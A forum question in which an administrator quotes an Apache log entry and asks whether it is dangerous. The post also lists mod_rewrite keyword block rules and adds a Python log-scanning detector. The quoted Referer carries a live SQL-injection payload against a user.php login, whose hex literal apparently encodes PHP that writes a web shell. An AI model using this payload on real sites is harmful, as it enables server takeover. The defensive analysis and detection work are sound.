
I've been seeing a lot of this in my Apache access log

0 votes
1 answer
611 views

    14.210.192.182 - - [01/May/2019:04:43:14 -0500] "GET /user.php?act=login HTTP/1.1" 302 233 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"

I'm not even sure how this type of exploit would work. It looks like it's trying to run sql from referer serialized data. Is this anything to worry about? All of the web apps on the server are using PDO with prepared statements.

Jail list: apache-badbots, apache-noscript, apache-overflows, apache-sqlinject, sshd

    RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(union|schema|sql|jdatabasedriver|ini_set|user\.php).* [NC]
    RewriteRule ^(.*)$ - [F,L]
    RewriteCond %{HTTP_REFERER} ^.*(union|schema|sql|jdatabasedriver|ini_set|user\.php).* [NC]
    RewriteRule ^(.*)$ - [F,L]

Asked by bSulz (11 rep)
May 1, 2019, 09:48 PM
Last activity: May 2, 2019, 03:23 PM
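
A detection sketch for entries like the one in the question, added here as an example and not part of the original post: it parses Apache combined-format lines (allowing for the `\"` escapes Apache writes inside quoted fields) and flags a Referer that shows at least two injection indicators. The indicator patterns, the threshold, the function names and both sample lines are assumptions made for illustration; the sample lines are constructed, with placeholder hex.

```python
import re

# A quoted combined-log field. Apache escapes quotes inside logged values
# as \", so "[^"]*" would cut the Referer short at the first escaped quote.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) '
    + QUOTED + ' ' + QUOTED + r'\s*$'
)

# Assumed indicators, chosen from the shape of the log line in the question.
INDICATORS = {
    "php_serialized": re.compile(r'[as]:\d+:[{\\"]'),   # a:2:{  or  s:3:\"
    "union_select": re.compile(r'union\s+select', re.I),
    "long_hex_literal": re.compile(r'0x[0-9a-f]{32,}', re.I),
    "sql_comment": re.compile(r'/\*|\*/|--\s'),
}

def parse(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, _size, referer, agent = m.groups()
    return {"ip": ip, "time": ts, "request": request,
            "status": int(status), "referer": referer, "agent": agent}

def suspicious_referer(line, threshold=2):
    """Return (ip, request, indicator names) when the Referer trips enough
    indicators, else None. One hit alone is treated as noise."""
    rec = parse(line)
    if rec is None:
        return None
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(rec["referer"]))
    return (rec["ip"], rec["request"], hits) if len(hits) >= threshold else None

# Constructed sample lines (documentation IPs, placeholder hex, not real traffic).
SAMPLE = [
    r'''203.0.113.7 - - [01/May/2019:04:43:14 -0500] "GET /user.php?act=login HTTP/1.1" 302 233 "deadbeefads|a:2:{s:3:\"num\";s:40:\"*/ union select 1,0x4141414141414141414141414141414141414141,3-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"''',
    r'''198.51.100.23 - - [01/May/2019:04:44:02 -0500] "GET /index.php HTTP/1.1" 200 5120 "https://example.com/search?q=student+union+events" "Mozilla/5.0 (X11; Linux x86_64)"''',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(suspicious_referer(entry))
```

The second sample is benign and is not flagged, although its Referer contains the word "union" and would therefore match a case-insensitive `union` alternation such as the one in the Referer `RewriteCond` above.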